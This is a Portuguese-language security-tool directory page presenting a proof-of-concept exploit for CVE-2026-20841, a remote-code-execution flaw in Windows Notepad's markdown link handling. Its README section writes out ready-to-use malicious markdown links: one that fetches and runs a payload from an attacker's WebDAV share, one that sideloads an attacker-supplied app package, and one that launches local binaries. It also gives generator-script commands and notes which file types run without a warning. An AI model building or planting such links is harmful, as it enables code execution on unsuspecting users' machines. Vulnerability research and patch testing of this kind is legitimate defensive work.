Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-20841 — Prova de conceito de exploit para CVE-2026-20841, uma RCE no Bloco de Notas do Windows via links de markdown. Gera arquivos .md personalizados para acionar payloads remotos, sideloading de aplicativos ou execução de binários locais. | Kitploit
Ferramentas/GitHubGitHub/atiilla/cve-2026-20841
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Prova de conceito de exploit para CVE-2026-20841, uma RCE no Bloco de Notas do Windows via links de markdown. Gera arquivos .md personalizados para acionar payloads remotos, sideloading de aplicativos ou execução de binários locais.

Ver Repositório
54há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-20841 - RCE no Bloco de Notas do Windows

PoC para uma falha de execução remota de código no renderizador de markdown do Bloco de Notas do Windows. O mecanismo de markdown não restringe protocolos de URL, permitindo que manipuladores de protocolo arbitrários sejam acionados por meio de links clicáveis.

Avisos

  1. Não é uma descoberta minha. O crédito vai para os pesquisadores originais no aviso do MSRC. Esta é uma recriação do PoC.
  2. Gravidade menor do que parece. Exige mais de um clique na maioria dos casos (veja Limitações). Construí isso porque "RCE no Bloco de Notas" é bom demais para deixar passar.

Vetores de Ataque

1. Payload Remoto (file:///)

root@kitploit:~
[clique](file:///\\atacante@5005\DavWWWRoot\payload.py)

O protocolo file:/// resolve caminhos UNC remotos. Vincule um payload e o Windows o buscará e executará ao clicar.

2. Sideload de Aplicativos (ms-appinstaller://)

root@kitploit:~
[clique](ms-appinstaller://?source=https://evil/xxx.appx)

Abre o Instalador de Aplicativos com um pacote .appx/.msix fornecido pelo atacante.

3. Execução de Binário Local (file://)

root@kitploit:~
[clique](file://C:/windows/system32/cmd.exe)

Inicia qualquer executável já presente no disco — cmd.exe, powershell.exe, mshta.exe, etc.

Uso

Ambos os scripts geram um poc.md com um link manipulado no diretório atual.

root@kitploit:~
node poc.js <host> <porta> <payload/caminho>
python poc.py <host> <porta> <payload/caminho>
root@kitploit:~
# exemplo
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Teste os payloads em payloads/.

Limitações

  1. Extensões perigosas ainda são sinalizadas. .exe, .lnk, .vbs e similares acionam um aviso de segurança do Windows, independentemente do comportamento do Bloco de Notas.
  2. Extensões de interpretador ignoram o aviso. .py e .jar são executados silenciosamente se Python ou Java estiverem instalados no alvo.

Notas

  • As versões vulneráveis do Bloco de Notas estão no Uptodown. Verifique a assinatura digital antes de usar.
  • Teste apenas em uma VM.

Fique seguro!

Baixar ferramenta